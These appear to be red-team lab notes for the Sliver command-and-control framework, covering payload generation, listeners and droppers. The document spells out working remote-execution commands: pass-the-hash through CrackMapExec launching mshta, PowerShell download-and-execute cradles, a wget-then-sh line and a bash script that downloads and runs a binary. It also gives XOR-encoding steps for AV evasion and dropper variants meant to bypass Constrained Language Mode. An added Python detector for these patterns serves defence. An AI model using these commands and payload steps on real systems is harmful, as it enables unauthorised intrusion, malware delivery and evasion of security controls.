πŸ” Run Automation

/opt/sliver/automation.sh

🧩 Script Actions Summary:

  1. Creates 3 Sliver profiles:

    • General Windows payload

    • Fiber injection shellcode (for AV evasion)

    • Linux binary payload

  2. Generates Payloads:

    • Windows shellcode

    • Linux binary

    • Fiber injection shellcode

  3. Starts Listeners:

    • General stager listener on 8443

    • HTTPS listener on 443

    • mTLS listener for fiber payload on 4443

  4. Creates C# Shellcode:

    • Via msfvenom, fetches Stage 2 from the Sliver stager

  5. Generates Droppers:

    • PowerShell dropper (dropper.txt)

    • .xml and .hta variants to bypass Constrained Language Mode


📦 Dropper Execution Methods

Use any of the following to trigger your payload remotely:

1. With CrackMapExec (CME)

cme smb <TargetIP> -u 'Administrator' -H <NTLM Hash> --local-auth -x "C:\\Windows\\System32\\mshta.exe http://10.10.15.154/sharp_new.hta"

2. Using mshta

mshta.exe http://10.10.15.154/sharp_new.hta

3. Using PowerShell (various encodings/escaping)

powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.15.154/sharp.ps1')"
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.154/sharp.ps1') | IEX
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.15.154/sharp.ps1%27)%22

4. Linux Dropper (Wget Method)

wget http://10.10.15.154/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh
  • I need to edit the automation script to make bad.sh work properly.

#!/bin/bash

# Define the URL and local file name
URL="http://10.8.2.41/bad"
FILE_NAME="downloaded_binary"

# Download the file
curl -o "$FILE_NAME" "$URL"

# Check if the download was successful
if [ -f "$FILE_NAME" ]; then
    echo "Download successful."

    # Make the file executable
    chmod +x "$FILE_NAME"

    # Execute the file
    echo "Executing the file..."
    ./"$FILE_NAME"
else
    echo "Failed to download the file."
fi
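
A defender's view of the launch methods above, as an added example that is not part of the original notes: a Python check that flags the mshta, PowerShell download-cradle and wget-then-sh command lines in process or web logs, decoding percent-encoding first so the URL-encoded variant is also caught. The rule names and sample lines are constructed for illustration, and 192.0.2.10 is a documentation address.

```python
import re
from urllib.parse import unquote

# Rule names are hypothetical; each pattern mirrors one launch method listed above.
RULES = {
    "mshta_remote_hta": re.compile(r"\bmshta(\.exe)?\b[^|&]*\bhttps?://", re.I),
    "ps_download_cradle": re.compile(
        r"(\biex\b|invoke-expression).*downloadstring\s*\("
        r"|downloadstring\s*\(.*\|\s*(iex\b|invoke-expression)", re.I),
    "fetch_then_sh": re.compile(
        r"\b(wget|curl)\b.*https?://\S+.*(&&|;)\s*(sh|bash)\s+/tmp/", re.I),
}

def normalize(cmdline):
    """Undo percent-encoding (up to 3 layers) and collapse whitespace."""
    for _ in range(3):
        decoded = unquote(cmdline)
        if decoded == cmdline:
            break
        cmdline = decoded
    return re.sub(r"\s+", " ", cmdline).strip()

def classify(cmdline):
    """Return the sorted names of every rule the normalized command line matches."""
    text = normalize(cmdline)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(lines):
    """Return (line_number, rule_names) for each line with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := classify(line))]

# Constructed sample command lines (not taken from real logs).
SAMPLES = [
    r"C:\Windows\System32\mshta.exe http://192.0.2.10/a.hta",
    "powershell \"IEX (New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')\"",
    "(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/a.ps1') | IEX",
    "powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://192.0.2.10/a.ps1%27)%22",
    "wget http://192.0.2.10/x.sh -O /tmp/x.sh && sh /tmp/x.sh",
    r"mshta.exe C:\Tools\help.hta",                               # benign: local file
    "curl -o /tmp/report.json https://example.org/report.json",  # benign: no execution
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLES):
        print(n, hits)
```

The fourth sample matches only after `normalize()` runs, which is why decoding belongs in front of the rules when the source is a web or proxy log.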

πŸ” Fiber Injection Payload Compilation Steps

  1. XOR Encode Shellcode

smart_xor_encoder shellcode.bin

  • Produces: encoded_shellcode.bin

  • Example XOR key used: 0x78

  2. Transfer to Development Windows Environment

mv encoded_shellcode.bin /media/sf_shared

  3. Integrate into Rust Project

  • Move to src/ folder of fiber injection project

  • Update the XOR key in source code

  4. Build Executable

cargo build --release

This creates an executable that you can use if the general methods don't work.


🌐 Network Range

10.10.110.0/24